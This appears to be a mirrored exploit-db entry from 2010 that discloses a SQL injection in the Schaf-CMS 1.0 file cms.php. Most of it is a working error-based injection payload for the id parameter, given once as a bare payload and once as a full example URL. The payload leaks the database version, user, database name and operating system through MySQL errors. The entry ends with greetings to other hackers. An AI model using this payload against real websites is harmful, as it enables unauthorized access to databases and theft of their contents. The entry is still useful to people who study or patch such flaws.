Schaf-CMS 1.0 – SQL Injection - 体验盒子

作者： Manas58

日期： 2010-05-24

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12720/

Schaf-CMS 1.0 SQL InjectionVulnerability 

###########################

Author: Manas58 
Homepage: http://www.1923turk.com
Script: Schaf-CMS 1.0
Download: http://www.brothersoft.com/site-builder-software---cms-53489.html 

###########################

[ Vulnerable File ]

cms.php?id= [ SQL ]
 

[ XpL ]

+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+


http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+

 

 
##############################################################
# Greetz: Gamoscu - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################